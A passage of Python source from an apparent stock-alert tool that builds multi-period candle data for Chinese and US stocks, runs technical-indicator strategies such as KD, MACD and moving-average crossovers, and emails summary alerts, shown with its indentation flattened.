def updatestockdata(stockdata: pd.DataFrame, isnewrow: bool = False, datasource = DataSource.EFINANCE):
def getrecordtime(period: int):
if (current_time - closetime) >= target_time or (opentime - current_time) >= target_time:
return datetime.datetime.combine(current_date, datetime.time(hour=15))
if period == 15 or period == 30:
slot = current_time.minute // period + 1
if slot == 60 // period:
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=current_time.hour + 1))
else:
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=current_time.hour, minute=slot * period))
elif period == 60:
if DataContext.iscountryChina():
if (current_time - opentime) >= target_time and (breakstarttime - current_time) >= target_time:
slot = (current_time - opentime).seconds // (period * 60) + 1
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=opentime.hour + slot, minute=opentime.minute))
else:
slot = (current_time - breakstoptime).seconds // (period * 60) + 1
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=breakstoptime.hour + slot))
elif DataContext.iscountryUS():
if target_time <= (closetime - current_time) <= datetime.timedelta(days=0, hours=0, minutes=30,
seconds=0):
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=closetime.hour))
else:
slot = (current_time - opentime).seconds // (period * 60) + 1
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=opentime.hour + slot, minute=opentime.minute))
return recordtime
def sumvolume(size_p: int, start: int, dataset: pd.DataFrame):
sum_volume = 0
try:
for j in range(size_p):
if start < 0:
sum_volume += dataset.iloc[start - j]['volume']
else:
sum_volume += dataset.iloc[start + j]['volume']
except Exception as exce:
# traceback.print_exc()
logger.error("Symbol error occurred with {} error message is {}".format(dataset.iloc[-1]['gid'], exce))
return sum_volume
def updateexistingrow(firstk: bool, barcounter: int, dataset: pd.DataFrame, isdayk: bool=False):
if isdayk:
dataset.loc[dataset.index[-1]] = [symbol_idx, row['OPEN'], row['NOW'], row['HIGH'], row['LOW'], row['VOLUME']]
return
if firstk:
volume_cur_i = row['VOLUME']
else:
sum_v_i = sumvolume(barcounter - 1, -2, dataset)
volume_cur_i = row['VOLUME'] - sum_v_i
open_tmp = dataset.iloc[-1]['open']
cur_high = dataset.iloc[-1]['high']
cur_low = dataset.iloc[-1]['low']
if row['NOW'] > cur_high:
cur_high = row['NOW']
if row['NOW'] < cur_low:
cur_low = row['NOW']
dataset.loc[dataset.index[-1]] = [symbol_idx, open_tmp, row['NOW'], cur_high, cur_low, volume_cur_i]
if fetchdatacounter == 1:
isfirstK_240 = True
else:
isfirstK_240 = False
if firstroundresult_60 == roundresult_60:
isfirstK_60 = True
else:
isfirstK_60 = False
if firstroundresult_30 == roundresult_30:
isfirstK_30 = True
else:
isfirstK_30 = False
if firstroundresult_15 == roundresult_15:
isfirstk_15 = True
else:
isfirstk_15 = False
round_number_15 = 0
round_number_30 = 0
round_number_60 = 0
for tmp_number in time_windows_15:
if tmp_number > 0:
round_number_15 += 1
for tmp_number in time_windows_30:
if tmp_number > 0:
round_number_30 += 1
for tmp_number in time_windows_60:
if tmp_number > 0:
round_number_60 += 1
for index in stockdata.index.array:
for sector_usd in context.markets:
# EM has been obsoleted.
# index_s = str(index)
index_s = stockdata['CODE'][index]
# only for Chinese stock
if datasource == DataSource.EFINANCE:
tmp_index_list = [index_s, exchanges[sector_usd]]
else:
tmp_index_list = [index_s[2:], index_s[0:2]]
index_s = ".".join(tmp_index_list)
sector_code = stock_group[sector_usd]
if index_s in context.symbols_exchange[sector_code]:
try:
if DataContext.iscountryChina():
symbol_idx = index_s[:-3]
elif DataContext.iscountryUS():
symbol_idx = index_s[:-2]
tmpdata = context.data15mins[sector_code].get(symbol_idx)
tmpdata_30 = context.data30mins[sector_code].get(symbol_idx)
tmpdata_60 = context.data60mins[sector_code].get(symbol_idx)
tmpdata_240 = context.data240mins[sector_code].get(symbol_idx)
row = stockdata.loc[index]
# create a new row based on the period of 15 mins and it represent the next period because it is the
# beginning of the next period so that it is needed to use next record time as index
if isnewrow:
record_time = getrecordtime(15)
if isfirstk_15:
volume_cur = row['VOLUME']
else:
sum_v = sumvolume(barcounter_15 - 1, -1, tmpdata)
volume_cur = row['VOLUME'] - sum_v
tmpdata.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'], row['NOW'],
row['NOW'], volume_cur]
record_time = getrecordtime(30)
if isfirstK_30:
tmpdata_30.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'],
row['NOW'], row['NOW'], row['VOLUME']]
else:
if (roundresult_15 % 2) == 0:
sum_v = sumvolume(barcounter_30 - 1, -1, tmpdata_30)
volume_cur = row['VOLUME'] - sum_v
tmpdata_30.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'],
row['NOW'], row['NOW'], volume_cur]
else:
updateexistingrow(isfirstK_30, barcounter_30, tmpdata_30)
record_time = getrecordtime(60)
if isfirstK_60:
tmpdata_60.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'],
row['NOW'], row['NOW'], row['VOLUME']]
else:
if (roundresult_15 % 4) == 0:
sum_v = sumvolume(barcounter_60 - 1, -1, tmpdata_60)
volume_cur = row['VOLUME'] - sum_v
tmpdata_60.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'],
row['NOW'], row['NOW'], volume_cur]
else:
updateexistingrow(isfirstK_60, barcounter_60, tmpdata_60)
if isfirstK_240:
tmpdata_240.loc[pd.Timestamp(current_date)] = [symbol_idx, row['OPEN'], row['NOW'],
row['HIGH'],
row['LOW'], row['VOLUME']]
else:
updateexistingrow(isfirstK_240, -1, tmpdata_240, True)
else:
updateexistingrow(isfirstk_15, barcounter_15, tmpdata)
updateexistingrow(isfirstK_30, barcounter_30, tmpdata_30)
updateexistingrow(isfirstK_60, barcounter_60, tmpdata_60)
updateexistingrow(isfirstK_240, -1, tmpdata_240, True)
except BaseException as be:
logger.debug("It is failed to update context data, symbol is {}".format(symbol_idx))
logger.error("It is failed to update context data", be)
break
# FIXME because EM has been obsoleted.
# calcrankofchange()
while True:
current_time = datetime.datetime.now()
if DataContext.iscountryChina():
timecondition = (((current_time - opentime) >= target_time and (breakstarttime - current_time) >= target_time)
or ((current_time - breakstoptime) >= target_time and (closetime - current_time) >= target_time))
elif DataContext.iscountryUS():
timecondition = (((current_time - opentime) >= target_time) and ((closetime - current_time) >= target_time))
if timecondition:
if update_stock_data_in_context():
# 3) calculate indicators
logger.debug("run 9 strategies")
try:
result = {current_time: quantstrategies(context)}
except Exception as ee:
logger.error("It is failed to execute quantitative strategies. error >>>", ee)
traceback.print_exc()
result = {}
else:
logger.info("execute quantitative strategies successfully.")
context.queue.put(result)
logger.debug("send result to another thread to handle and sleep")
logger.debug("start to sleep with 720 seconds")
# TODO: replace sleep() with threading.Timer()
time.sleep(720)
logger.debug("sleep is done with 720 seconds")
# if closetime - current_time > datetime.timedelta(minutes=5):
# else:
# logger.debug("start to sleep with 45 seconds")
# time.sleep(45)
# logger.debug("sleep is done with 45 seconds")
'''
EM has been obsoleted.
elif stock_data.ErrorCode != 0:
logger.debug("Request csqsnapshot Error error code is {}; error message is {}; codes is {}".
format(stock_data.ErrorCode, stock_data.ErrorMsg, stock_data.Codes))
if stock_data.ErrorCode == 10002008 or stock_data.ErrorMsg.find('timeout') != -1:
logger.debug("timeout occurred so sleep 180 seconds and then logout")
logout_em()
time.sleep(180)
logger.debug("login again after sleeping 180")
login_em()
time.sleep(30)
logger.debug("sleep of 30 is done due to error occurring during requesting csqsnapshot")
'''
elif (current_time - closetime) >= target_time:
# FIXME: Only for datasource AKShare
# if not update_stock_data_in_context():
# update_stock_data_in_context(1200)
summarytotalresult(context)
logger.debug("market is closed so that snapshot quits")
context.queue.put(ProcessStatus.STOP)
print("time windows for 15 mins:")
print(time_windows_15)
print("time windows for 30 mins:")
print(time_windows_30)
print("time windows for 60 mins:")
print(time_windows_60)
print("total number of fetching data is %d" % fetchdatacounter)
break
else:
logger.debug("market is not open or break is ongoing so that await. Now is {}".format(current_time))
time.sleep(10)
lock_qm = threading.Lock()
queue_history_data = Queue()
failed_to_get_data_symbols = []
# TODO refactor below codes with command-chain pattern
@time_measure
def quantstrategies(context: DataContext):
global lock_qm
totalresultdata = {}
transientresult100 = context.totalresult[DataContext.strategy100]
for sector_usd in context.markets:
resultdata = {}
sector_tmp = stock_group[sector_usd]
for symbol_tmp in context.symbols[sector_tmp]:
results = {}
try:
runStrategies(transientresult100, symbol_tmp, sector_tmp,
context, resultdata, results)
except BaseException as be:
logger.debug("runStrategies is failed, symbol is {}".format(symbol_tmp))
logger.error("runStrategies is failed, symbol is {}".format(symbol_tmp), be)
totalresultdata[sector_tmp] = resultdata
return totalresultdata
def runStrategies(transientresult100, symbol_tmp, sector_tmp, context,
resultdata, results):
with lock_qm:
length_totalresult100 = len(transientresult100)
issymbolintotalresult100 = symbol_tmp in transientresult100
if length_totalresult100 > 0:
if not issymbolintotalresult100:
return False
else:
dataset_240 = context.data240mins[sector_tmp].get(symbol_tmp)
if len(dataset_240) == 0:
return False
strategy_dayk = StrategyBasedOnDayKAction(dataset_240)
valid_240_amplitude, result_amplitude_240 = strategy_dayk.executeaction(operation='amplitude_avg')
if valid_240_amplitude:
if len(result_amplitude_240) > 0:
results[DataContext.strategy100] = result_amplitude_240
resultdata[symbol_tmp] = results
else:
return False
else:
logger.error("strategy_amplitude_avg_240 is failed on {}".format(symbol_tmp))
return False
dataset_240 = context.data240mins[sector_tmp].get(symbol_tmp)
expma_cross_240 = EXPMACrossAction(dataset_240)
valid_expma_240, value_240_expma = expma_cross_240.executeaction()
if valid_expma_240:
if len(value_240_expma) > 0:
results[DataContext.strategy8] = value_240_expma
resultdata[symbol_tmp] = results
else:
logger.error("strategy_expma_cross_240 is failed on {}".format(symbol_tmp))
dataset_30 = context.data30mins[sector_tmp].get(symbol_tmp)
expma_cross_30 = EXPMACrossAction(dataset_30)
valid_expma_30, value_30_expma = expma_cross_30.executeaction()
if valid_expma_30:
if len(value_30_expma) > 0:
results[DataContext.strategy9] = value_30_expma
resultdata[symbol_tmp] = results
else:
logger.error("strategy_expma_cross_30 is failed on {}".format(symbol_tmp))
dataset_60 = context.data60mins[sector_tmp].get(symbol_tmp)
if len(dataset_60) == 0:
return False
expma_cross_60 = EXPMACrossAction(dataset_60)
valid_expma_60, value_60_expma = expma_cross_60.executeaction()
if valid_expma_60:
if len(value_60_expma) > 0:
results[DataContext.strategy10] = value_60_expma
resultdata[symbol_tmp] = results
else:
logger.error("strategy_expma_cross_60 is failed on {}".format(symbol_tmp))
kd_60 = StrategyBasedOnKDAction(dataset_60)
valid_60_kd_cross, result_kd_cross_60 = kd_60. \
executeaction(occurrence_time=[dataset_60.index[-1]],
operation='cross_up')
if valid_60_kd_cross:
if len(result_kd_cross_60) > 0:
macd_cross_60 = StrategyBasedonMACDAction(dataset_60, 2)
valid_60_macd_cross, result_macd_cross_60 = macd_cross_60.executeaction(operation='cross_up')
if valid_60_macd_cross:
if len(result_macd_cross_60) > 0:
results[DataContext.strategy11] = result_macd_cross_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_macd_cross_up_60 is failed on {}".format(symbol_tmp))
else:
logger.error("strategy_kd_cross_up_60 is failed on {}".format(symbol_tmp))
# FIXME
'''
valid_60_kd_deviate, result_kd_deviate_60 = kd_60. \
executeaction(occurrence_time=[dataset_60.index[-1]],
operation='divergence_price_lower_and_k_higher')
if valid_60_kd_deviate:
if len(result_kd_deviate_60) > 0:
results[DataContext.strategyx] = result_kd_deviate_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_kd_deviate_60 is failed on {}".format(symbol_tmp))
'''
valid_60_kd_deviate, result_kd_deviate_60 = kd_60. \
executeaction(occurrence_time=[dataset_60.index[-1]],
operation='divergence_price_lower_and_k_higher_simple',
duration=20)
if valid_60_kd_deviate:
if len(result_kd_deviate_60) > 0:
results[DataContext.strategy12] = result_kd_deviate_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_kd_deviate_60 is failed on {}".format(symbol_tmp))
price_kavg_60 = StrategyBasedOnDayKAction(dataset_60)
valid_60_price_ma, result_price_ma_60 = price_kavg_60.executeaction(operation='price_k_avg')
if valid_60_price_ma:
if len(result_price_ma_60) > 0:
valid_60_entangle_crossup_period, result_entangle_crossup_period_60 = \
kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle_and_cross_up_within_period',
periods=4,
duration=40)
if valid_60_entangle_crossup_period:
if len(result_entangle_crossup_period_60) > 0:
results[DataContext.strategy13] = result_entangle_crossup_period_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_kd_entangle_and_cross_up_60 is failed on {}".format(symbol_tmp))
valid_60_entangle_period, result_entangle_period_60 = \
kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle_within_period',
periods=4,
duration=40)
if valid_60_entangle_period:
if len(result_entangle_period_60) > 0:
valid_30_crossup, result_crossup_30 = \
StrategyBasedOnKDAction(dataset_30).executeaction(
occurrence_time=[dataset_30.index[-1]],
operation='cross_up')
if valid_30_crossup:
if len(result_crossup_30) > 0:
results[DataContext.strategy14] = result_crossup_30
resultdata[symbol_tmp] = results
else:
logger.error("strategy_kd_cross_up_30 is failed on {}".format(symbol_tmp))
else:
logger.error("strategy_kd_entangle_60 is failed on {}".format(symbol_tmp))
else:
logger.error("strategy_price_ma_60 is failed on {}".format(symbol_tmp))
ma_go_60 = StrategyBasedOnDayKAction(dataset_60)
valid_60_ma, result_ma_60 = ma_go_60.executeaction(operation='avg_k_go')
if valid_60_ma:
if len(result_ma_60) > 0:
results[DataContext.strategy102] = result_ma_60
resultdata[symbol_tmp] = results
else:
return False
else:
logger.error("strategy_ma_avg_60 is failed on {}".format(symbol_tmp))
return False
expma_go_60 = StrategyBasedOnDayKAction(dataset_60)
valid_60_expema_dif, result_expema_dif_60 = expma_go_60.executeaction(operation='expma_dif_go')
if valid_60_expema_dif:
if len(result_expema_dif_60) > 0:
results[DataContext.strategy104] = result_expema_dif_60
resultdata[symbol_tmp] = results
else:
return False
else:
logger.error("strategy_expma_dif_go_60 is failed on {}".format(symbol_tmp))
return False
macd_go_60 = StrategyBasedonMACDAction(dataset_60, 2)
ismacd_strcit = False
ismacd_diff = False
valid_60_macd_strict, result_macd_strict_60 = macd_go_60.executeaction(operation='strict')
if valid_60_macd_strict:
if len(result_macd_strict_60) > 0:
results[DataContext.strategy101] = result_macd_strict_60
resultdata[symbol_tmp] = results
ismacd_strcit = True
else:
logger.error("strategy_macd_strict_60 is failed on {}".format(symbol_tmp))
if not ismacd_strcit:
valid_60_macd_dif, result_macd_dif_60 = macd_go_60.executeaction(operation='dif')
if valid_60_macd_dif:
if len(result_macd_dif_60) > 0:
results[DataContext.strategy103] = result_macd_dif_60
resultdata[symbol_tmp] = results
ismacd_diff = True
else:
logger.error("strategy_macd_diff_60 is failed on {}".format(symbol_tmp))
if not ismacd_strcit and not ismacd_diff:
return False
'''
dataset_30 = context.data30mins[sector_tmp].get(symbol_tmp)
kd_cross_30 = StrategyBasedOnKDAction(dataset_30)
kd_indicator_30 = KDAction(dataset_30, context.rsv_period, context.k_period, context.d_period)
valid_kd_30, k_v_30, d_v_30 = kd_indicator_30.executeaction()
ma_cross = CROSSUpMAAction(context.data15mins[sector_tmp].get(symbol_tmp))
valid, result_tmp = ma_cross.executeaction(startindex=context.start_i, endindex=context.end_i,
cross_period=context.cross_sma_period,
greater_period=context.greater_than_sma_period)
if valid:
if len(result_tmp) > 0:
time_sequence = []
for time_stamp_original in result_tmp['time'].array:
tmp_date = datetime.date(year=time_stamp_original.year, month=time_stamp_original.month,
day=time_stamp_original.day)
if time_stamp_original.minute == 0:
time_stamp = time_stamp_original
elif time_stamp_original.minute <= 30:
time_stamp = pd.Timestamp(datetime.datetime.combine(tmp_date,
datetime.time(
hour=time_stamp_original.hour,
minute=30)))
else:
time_stamp = pd.Timestamp(datetime.datetime.combine(tmp_date,
datetime.time(
hour=time_stamp_original.hour + 1)))
time_sequence.append(time_stamp)
if not valid_kd_30:
logger.error("strategy_cross_kd_30 is failed on {}".format(symbol_tmp))
else:
valid, result_tmp = kd_cross_30.executeaction(occurrence_time=time_sequence,
operation='cross_up',
KValues=k_v_30,
DValues=d_v_30,
crossvalue=(False, 0))
if valid:
# FIXME
if len(result_tmp) > 0:
obv_up = OBVUpACTION(context.data30mins[sector_tmp].get(symbol_tmp))
valid, result_tmp = obv_up.executeaction(occurrence_time=result_tmp['time'],
obv_period=context.obv_period,
obv_a_period=context.obv_a_period)
if valid:
if len(result_tmp) > 0:
results[DataContext.strategy1] = result_tmp
resultdata[symbol_tmp] = results
else:
logger.error("strategy_obv_up_30 is failed on {}".format(symbol_tmp))
if len(result_tmp) > 0:
results[DataContext.strategy1] = result_tmp
resultdata[symbol_tmp] = results
else:
logger.error("strategy_cross_kd_30 is failed on {}".format(symbol_tmp))
else:
logger.error("strategy_cross_70 is failed on {}".format(symbol_tmp))
if not valid_kd_30:
logger.error("strategy_entangle_crossup_kd_30 is failed on {}".format(symbol_tmp))
else:
valid_30_entangle_crossup_period, result_entangle_crossup_period_30 = \
kd_cross_30.executeaction(occurrence_time=[dataset_30.index[-1]],
operation='entangle_and_cross_up_within_period',
KValues=k_v_30,
DValues=d_v_30,
periods=4,
duration=80,
crossvalue=(False, 0))
if valid_30_entangle_crossup_period:
if len(result_entangle_crossup_period_30) > 0:
results[DataContext.strategy6] = result_entangle_crossup_period_30
resultdata[symbol_tmp] = results
else:
logger.error("strategy_entangle_crossup_kd_30 is failed on {}".format(symbol_tmp))
valid_60, result_tmp_60 = kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='cross_up',
crossvalue=(True, 30))
if valid_60:
if len(result_tmp_60) > 0:
results[DataContext.strategy2] = result_tmp_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_cross_kd_60 is failed on {}".format(symbol_tmp))
valid_60_entangle, result_entangle_60 = kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle',
crossvalue=(True, 30),
periods=4)
if valid_60_entangle:
if len(result_entangle_60) > 0:
results[DataContext.strategy3] = result_entangle_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_entangle_kd_60 is failed on {}".format(symbol_tmp))
'''
valid_60_entangle_crossup_period, result_entangle_crossup_period_60 = \
kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle_and_cross_up_within_period',
periods=4,
duration=40)
if valid_60_entangle_crossup_period:
if len(result_entangle_crossup_period_60) > 0:
if ismacd_diff:
results[DataContext.strategy7] = result_entangle_crossup_period_60
elif ismacd_strcit:
results[DataContext.strategy5] = result_entangle_crossup_period_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_entangle_crossup_period_kd_60 is failed on {}".format(symbol_tmp))
if not ismacd_strcit:
return False
valid_60_entangle_crossup, result_entangle_crossup_60 = \
kd_60.executeaction(occurrence_time=[dataset_60.index[-1]],
operation='entangle_and_cross_up',
periods=4)
if valid_60_entangle_crossup:
if len(result_entangle_crossup_60) > 0:
results[DataContext.strategy4] = result_entangle_crossup_60
resultdata[symbol_tmp] = results
else:
logger.error("strategy_entangle_crossup_kd_60 is failed on {}".format(symbol_tmp))
return True
# FIXME because EM has been obsoleted.
def calcrankofchange():
if DataContext.iscountryChina():
prefix = "B_"
current_date = datetime.datetime.now().strftime("%Y-%m-%d")
# 偏移N天交易日
date_offset = c.getdate(current_date, -11, "Market=CNSESH")
if date_offset.ErrorCode != 0:
logger.error("ErrorCode is %d and ErrorMsg is %s" % (date_offset.ErrorCode, date_offset.ErrorMsg))
return False
# 区间涨跌幅(流通市值加权平均):CPPCTCHANGEFMWAVG 区间资金净流入:PNETINFLOWSUM
sectors_q = list(sectors_CN.keys())
i = 1
sectors_length = len(sectors_q) - 6
sectors_v = []
while i < sectors_length:
j = i + 6
if j > sectors_length:
j = sectors_length
sectors_g = ",".join(map(lambda x: prefix + x, sectors_q[i:j]))
sector_data = c.cses(sectors_g, "CPPCTCHANGEFMWAVG,PNETINFLOWSUM",
"StartDate={},EndDate={}, IsHistory=0, Ispandas=1, ShowBlank=0".format(
date_offset.Data[0], current_date))
sectors_v.append(sector_data)
i += 6
logger.debug("%d sectors has been scanned" % (sectors_length - 1))
sectors_df = pd.concat(sectors_v)
sectors_df_change_d = sectors_df.sort_values(by='CPPCTCHANGEFMWAVG', ascending=False)
sectors_df_mf_d = sectors_df.sort_values(by='PNETINFLOWSUM', ascending=False)
sectors_list_change_d = sectors_df_change_d.index.tolist()
sectors_list_mf_d = sectors_df_mf_d.index.tolist()
if len(sectors_df) > 50:
list_sectors_change = sectors_list_change_d[:50]
list_sectors_change_r = sectors_list_change_d[:-51:-1]
list_sectors_mf = sectors_list_mf_d[:50]
list_sectors_mf_r = sectors_list_mf_d[:-51:-1]
else:
list_sectors_change = sectors_list_change_d
list_sectors_change_r = sectors_list_change_d[::-1]
list_sectors_mf = sectors_list_mf_d
list_sectors_mf_r = sectors_list_mf_d[::-1]
e_subject = "版块排名_" + datetime.datetime.now().strftime("%Y%m%d")
e_content = ""
filepath = os.path.join(DataContext.dir_name, e_subject)
with open(filepath, 'w+') as file:
tmp_str = "涨幅版块排名\r\n"
file.write(tmp_str)
e_content += tmp_str
for index in list_sectors_change:
column = sectors_df_change_d['CPPCTCHANGEFMWAVG']
sector_name = sectors_CN[index.lstrip(prefix)]
tmp_str = "版块名称: {} -- 幅度: {}% \r\n".format(sector_name, column[index])
file.write(tmp_str)
e_content += tmp_str
tmp_str = "\r\n跌幅版块排名\r\n"
file.write(tmp_str)
e_content += tmp_str
for index in list_sectors_change_r:
column = sectors_df_change_d['CPPCTCHANGEFMWAVG']
sector_name = sectors_CN[index.lstrip(prefix)]
tmp_str = "版块名称: {} -- 幅度: {}% \r\n".format(sector_name, column[index])
file.write(tmp_str)
e_content += tmp_str
tmp_str = "\r\n资金净流入版块排名 - 从高到低\r\n"
file.write(tmp_str)
e_content += tmp_str
for index in list_sectors_mf:
column = sectors_df_mf_d['PNETINFLOWSUM']
sector_name = sectors_CN[index.lstrip(prefix)]
tmp_str = "版块名称: {} -- 资金: {} \r\n".format(sector_name, column[index])
file.write(tmp_str)
e_content += tmp_str
tmp_str = "\r\n资金净流入版块排名 - 从低到高\r\n"
file.write(tmp_str)
e_content += tmp_str
for index in list_sectors_mf_r:
column = sectors_df_mf_d['PNETINFLOWSUM']
sector_name = sectors_CN[index.lstrip(prefix)]
tmp_str = "版块名称: {} -- 资金: {} \r\n".format(sector_name, column[index])
file.write(tmp_str)
e_content += tmp_str
sendemail(e_subject, e_content, DataContext.email_recipient)
sendemail(e_subject, e_content, DataContext.email_other1_recipient)
sendemail(e_subject, e_content, DataContext.email_other2_recipient)
def summarytotalresult(context: DataContext):
e_subject = "预警汇总_" + datetime.datetime.now().strftime("%Y%m%d")
e_content = ""
filepath = os.path.join(DataContext.dir_name, e_subject)
with open(filepath, 'w+') as file:
for strategy_t, symbols in context.totalresult.items():
str101 = ""
if strategy_t == DataContext.strategy6:
str101 = "\r\n\r\n\r\n\r\n\r\n策略6 - 30分钟周期\r\n"
elif strategy_t == DataContext.strategy14:
str101 = "\r\n\r\n\r\n\r\n\r\n策略14 - 30分钟周期:\r\n"
elif strategy_t == DataContext.strategy13:
str101 = "\r\n\r\n\r\n\r\n\r\n策略13 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy12:
str101 = "\r\n\r\n\r\n\r\n\r\n策略12 - 日周期:\r\n"
elif strategy_t == DataContext.strategy11:
str101 = "\r\n\r\n\r\n\r\n\r\n策略11 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy10:
str101 = "\r\n\r\n\r\n\r\n\r\n策略10 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy9:
str101 = "\r\n\r\n\r\n\r\n\r\n策略9 - 30分钟周期:\r\n"
elif strategy_t == DataContext.strategy8:
str101 = "\r\n\r\n\r\n\r\n\r\n策略8 - 日周期:\r\n"
elif strategy_t == DataContext.strategy7:
str101 = "\r\n\r\n\r\n\r\n\r\n策略7 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy5:
str101 = "\r\n\r\n\r\n\r\n\r\n策略5 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy4:
str101 = "\r\n\r\n\r\n\r\n\r\n策略4 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy3:
str101 = "\r\n\r\n\r\n\r\n\r\n策略3 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy1:
str101 = "\r\n\r\n\r\n\r\n\r\n策略1 - 15分钟周期:\r\n"
elif strategy_t == DataContext.strategy2:
str101 = "\r\n\r\n\r\n\r\n\r\n策略2 - 60分钟周期:\r\n"
elif strategy_t == DataContext.strategy1_2:
str101 = "\r\n\r\n\r\n\r\n\r\n同时满足策略1和策略2的预警条件:\r\n\r\n"
elif strategy_t == DataContext.strategy1_4:
str101 = "\r\n\r\n\r\n\r\n\r\n同时满足策略1和策略4的预警条件:\r\n\r\n"
if str101 != "":
file.write(str101)
e_content += str101
symbols_str = " ".join(symbols.keys())
file.write(symbols_str)
e_content += symbols_str
sendemail(e_subject, e_content, DataContext.email_recipient)
# FIXME
# sendemail(e_subject, e_content, DataContext.email_other1_recipient)
# sendemail(e_subject, e_content, DataContext.email_other2_recipient)
# the function runs in a separate thread
@time_measure
def handleresult(context: DataContext):
while True:
resultfromq = context.queue.get()
if isinstance(resultfromq, ProcessStatus) and resultfromq == ProcessStatus.STOP:
logger.debug("The thread of handleresult quits")
break
subject_e1, content_e1, subject_e2, content_e2 = handleresultlocked(mergeresult(context, resultfromq), context)
logger.debug("handleresultlocked was done")
# send it via sina email
time_cur = datetime.datetime.now()
if datetime.datetime.combine(datetime.date(year=time_cur.year, month=time_cur.month, day=time_cur.day),
context.marketclosetime) - time_cur <= datetime.timedelta(minutes=DataContext.sendemial_interval) \
or context.sendemailtime is None \
or time_cur - context.sendemailtime >= datetime.timedelta(minutes=DataContext.sendemial_interval):
sendemail(subject_e1, content_e1, DataContext.email_recipient)
context.sendemailtime = time_cur
class CalcResult:
def __init__(self, ctime, isvgreater: bool):
self.cross_time = ctime
self.isgreater_v = isvgreater
def mergeresult(context: DataContext, result_transient, ishistory: bool = False):
def assembleFunc(symbol, strategy: str):
symbol_s = str(symbol)
symbols[strategy].append(symbol_s)
if ishistory:
append_value(context.totalresult[strategy], symbol_s, CalcResult(row[6], row[7]))
else:
append_value(context.totalresult[strategy], symbol_s, CalcResult(keytime, row[7]))
def calcresult(strategy_n: str):
# result_c = set(symbols[strategy_n]).intersection(result_c_s100)
result_c = set(symbols[strategy_n])
logger.info("%d symbols found with %s at %s" % (len(result_c), strategy_n, keytime))
return result_c
# result_h_s1 = set(context.totalresult[DataContext.strategy1].keys())
# result_h_s2 = set(context.totalresult[DataContext.strategy2].keys())
# result_h_s3 = set(context.totalresult[DataContext.strategy3].keys())
result_h_s4 = set(context.totalresult[DataContext.strategy4].keys())
result_h_s5 = set(context.totalresult[DataContext.strategy5].keys())
result_h_s7 = set(context.totalresult[DataContext.strategy7].keys())
result_h_s8 = set(context.totalresult[DataContext.strategy8].keys())
result_h_s9 = set(context.totalresult[DataContext.strategy9].keys())
result_h_s10 = set(context.totalresult[DataContext.strategy10].keys())
result_h_s11 = set(context.totalresult[DataContext.strategy11].keys())
result_h_s12 = set(context.totalresult[DataContext.strategy12].keys())
result_h_s13 = set(context.totalresult[DataContext.strategy13].keys())
result_h_s14 = set(context.totalresult[DataContext.strategy14].keys())
keytime = datetime.datetime.now()
symbols = {DataContext.strategy1: [], DataContext.strategy2: [], DataContext.strategy3: [], DataContext.strategy4: [],
DataContext.strategy5: [], DataContext.strategy6: [], DataContext.strategy100: [], DataContext.strategy101: [],
DataContext.strategy102: [], DataContext.strategy7: [], DataContext.strategy103: [], DataContext.strategy8: [],
DataContext.strategy104: [], DataContext.strategy9: [], DataContext.strategy10: [], DataContext.strategy11: [],
DataContext.strategy12: [], DataContext.strategy13: [], DataContext.strategy14: []}
global lock_qm
with lock_qm:
for time_result, result in result_transient.items():
keytime = time_result
for index, value in result.items():
for index_1, value_1 in value.items():
for index_2, value_2 in value_1.items():
'''
if index_2 == DataContext.strategy1:
for row in value_2.itertuples(index=False):
if row[7]:
assembleFunc(index_1, DataContext.strategy1)
elif index_2 == DataContext.strategy2:
for row in value_2.itertuples(index=False):
if row[2] <= 50:
assembleFunc(index_1, DataContext.strategy2)
elif index_2 == DataContext.strategy3:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy3)
'''
if index_2 == DataContext.strategy4:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy4)
elif index_2 == DataContext.strategy5:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy5)
elif index_2 == DataContext.strategy100:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy100)
elif index_2 == DataContext.strategy101:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy101)
elif index_2 == DataContext.strategy102:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy102)
elif index_2 == DataContext.strategy7:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy7)
elif index_2 == DataContext.strategy103:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy103)
elif index_2 == DataContext.strategy104:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy104)
elif index_2 == DataContext.strategy8:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy8)
elif index_2 == DataContext.strategy9:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy9)
elif index_2 == DataContext.strategy10:
